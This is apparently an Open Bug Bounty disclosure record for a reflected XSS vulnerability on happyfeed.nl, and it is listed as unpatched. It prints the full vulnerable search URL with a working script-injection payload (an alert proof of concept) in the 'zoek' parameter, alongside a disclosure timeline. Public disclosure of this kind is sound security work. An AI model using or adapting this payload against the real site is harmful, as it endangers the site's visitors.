happyfeed.nl XSS vulnerability

2015-11-26T22:56:00
ID OBB:109393
Type openbugbounty
Reporter vdvcoder
Modified 2016-02-18T23:11:00

Description

Vulnerable URL:
http://www.happyfeed.nl/m4n/contentsystem/zoek.php?zoek=%22%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C/script%3Emarketing&page;=4&columns;=1&search;=&fb;=&navi;=1&categorybox;=&subcategorybox;=&title;=1&img;=&desc;=1&mer;=&cat;=&brand;=&price;=0&resultwidth;=&width;=&height;=&blockwidth;=&catsearch;=&subsearch;=&allmer;=&results;=15&contenttype;=content&template;=contenttemplate&merchant;=Nationalevacaturebank&user;=&orderby;=relevance&distinct;=&bt;=&bi;=&color;=FFFFFF&bgc;=FFFFFF&bc;=FFFFFF&tc;=000000&tec;=000000&uc;=07519A&hc;=FFFFFF&htc;=000000&align;=left&imga;=center&imgr;=&imgh;=50&imgw;=50&fsize;=11&fface;=arial&fdeco;=&border;=&tboxsize;=22&buttonw;=100&name;=&cst;=&rnk;=&all;=&nt0;=5589&nt1;=&nt2;=&nt3;=&nt4;=&nt5;=&nt6;=&nt7;=&nt8;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check happyfeed.nl SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 26 November, 2015 22:56 GMT
Vulnerability existence verified and confirmed| 26 November, 2015 22:58 GMT
Vulnerability details disclosed by researcher| 18 February, 2016 23:11 GMT